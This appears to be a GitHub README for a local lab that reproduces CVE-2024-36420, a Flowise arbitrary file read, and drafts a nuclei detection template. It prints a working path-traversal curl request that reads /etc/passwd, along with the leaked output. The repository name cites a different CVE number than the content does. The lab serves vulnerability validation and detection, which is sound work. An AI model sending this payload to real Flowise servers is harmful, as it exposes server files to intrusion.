junn34/POC_CVE-2024-10829

# POC_CVE-2024-36420 Local reproduction lab and nuclei template draft for `CVE-2024-36420` affecting Flowise. ## Summary `CVE-2024-36420` is an arbitrary file read in Flowise caused by unsanitized use of the `fileName` body parameter in: - `POST /api/v1/openai-assistants-file` This lab was used to validate: - vulnerable behavior on `flowiseai/flowise:1.4.3` - denied behavior on newer `flowiseai/flowise:3.1.2` ## References - NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420 - GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/ ## Files - `docker-compose.yml` - `docker-compose.latest.yml` - `CVE-2024-36420.yaml` ## Vulnerable Test Start Flowise `1.4.3`: docker compose down -v docker compose up -d docker compose logs --tail=100 flowise Manual verification: curl -i \ -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \ -H 'Content-Type: application/json' \ -d '{"fileName":"../../../../etc/passwd"}' Observed vulnerable response: HTTP/1.1 200 OK Content-Disposition: attachment; filename=passwd ... root:x:0:0:root:/root:/bin/ash daemon:x:2:2:daemon:/sbin:/sbin/nologin ... ## Newer-Version Control Start newer Flowise `3.1.2`: docker compose -f docker-compose.latest.yml down -v docker compose -f docker-compose.latest.yml up -d docker compose -f docker-compose.latest.yml logs --tail=100 flowise Manual verification: curl -i \ -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \ -H 'Content-Type: application/json' \ -d '{"fileName":"../../../../etc/passwd"}' Observed newer-version response: HTTP/1.1 401 Unauthorized {"error":"Unauthorized Access"} ## Nuclei Validate the template: nuclei -duc -validate -t CVE-2024-36420.yaml Run against the vulnerable target: nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml Expected behavior: - `1.4.3`: match - `3.1.2`: no match ## Notes - The version gap is acceptable because this repo only claims observed behavior: - vulnerable on `1.4.3` - denied on `3.1.2` - It does not claim the exact patched version boundary. - No real-world targets were used.